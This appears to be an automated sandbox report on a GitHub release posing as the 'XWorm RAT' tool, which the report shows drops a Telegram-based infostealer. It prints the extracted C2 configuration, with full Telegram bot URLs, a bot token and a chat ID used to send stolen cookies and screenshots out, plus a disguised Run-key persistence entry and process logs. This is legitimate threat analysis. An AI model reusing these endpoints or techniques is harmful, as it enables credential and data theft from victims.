Resubmissions
09-01-2025 19:49
250109-yjtbhs1nck 1009-01-2025 19:48
250109-yjlaxa1nbq 309-01-2025 18:48
250109-xf75tszlcj 1009-01-2025 18:45
250109-xeef5azkfp 1009-01-2025 18:34
250109-w7sc1szjak 1009-01-2025 18:31
250109-w54y2axkf1 1003-01-2025 17:08
250103-vntw3atqdt 1003-01-2025 15:27
250103-svv2latmgr 1003-01-2025 15:23
250103-sslp5stlhk 10Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-01-2025 18:34
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Resource
win10v2004-20241007-en
General
-
Target
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Command Reciever.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation conhost.exe -
Executes dropped EXE 2 IoCs
pid Process 4472 Command Reciever.exe 4072 conhost.exe -
Loads dropped DLL 2 IoCs
pid Process 4472 Command Reciever.exe 4072 conhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdate\\conhost.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 76 raw.githubusercontent.com 77 raw.githubusercontent.com 84 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 74 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 868 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWorm RAT V2.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Command Reciever.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier conhost.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Command Reciever.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Command Reciever.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 conhost.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2528 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 31 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" Command Reciever.exe Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" Command Reciever.exe Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" Command Reciever.exe Set value (data) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 Command Reciever.exe Set value (data) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff Command Reciever.exe Set value (data) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 Command Reciever.exe Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "6" Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg Command Reciever.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Command Reciever.exe Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" Command Reciever.exe Set value (data) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 Command Reciever.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents" Command Reciever.exe Set value (data) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Command Reciever.exe Set value (data) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Command Reciever.exe Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Command Reciever.exe Set value (data) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Command Reciever.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell Command Reciever.exe Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" Command Reciever.exe Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" Command Reciever.exe Set value (data) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 Command Reciever.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Command Reciever.exe Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" Command Reciever.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5140 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4560 msedge.exe 4560 msedge.exe 4876 msedge.exe 4876 msedge.exe 336 identity_helper.exe 336 identity_helper.exe 864 msedge.exe 864 msedge.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 4472 Command Reciever.exe 620 Command Reciever.exe 620 Command Reciever.exe 620 Command Reciever.exe 620 Command Reciever.exe 620 Command Reciever.exe 620 Command Reciever.exe 620 Command Reciever.exe 620 Command Reciever.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 620 Command Reciever.exe 620 Command Reciever.exe 620 Command Reciever.exe 620 Command Reciever.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 620 Command Reciever.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4472 Command Reciever.exe Token: SeDebugPrivilege 868 tasklist.exe Token: SeDebugPrivilege 4072 conhost.exe -
Suspicious use of FindShellTrayWindow 53 IoCs
pid Process 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 620 Command Reciever.exe 620 Command Reciever.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 620 Command Reciever.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4072 conhost.exe 620 Command Reciever.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4876 wrote to memory of 1936 4876 msedge.exe 82 PID 4876 wrote to memory of 1936 4876 msedge.exe 82 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 1380 4876 msedge.exe 83 PID 4876 wrote to memory of 4560 4876 msedge.exe 84 PID 4876 wrote to memory of 4560 4876 msedge.exe 84 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85 PID 4876 wrote to memory of 3028 4876 msedge.exe 85
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Intestio/XWorm-RAT/releases/tag/xworm1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed61946f8,0x7ffed6194708,0x7ffed61947182⤵PID:1936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:22⤵PID:1380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:82⤵PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:12⤵PID:1540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:12⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:82⤵PID:1112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:12⤵PID:940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:12⤵PID:3284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5332 /prefetch:82⤵PID:4132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:12⤵PID:1100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:12⤵PID:2444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:12⤵PID:1328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,10847997208899285934,1064006154503699535,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4844 /prefetch:22⤵PID:5676
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3232
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:748
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1820
-
C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- System Location Discovery: System Language Discovery
PID:436 -
C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:620
-
-
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp6387.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp6387.tmp.bat3⤵PID:1900
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:4936
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4472"4⤵
- Enumerates processes with tasklist
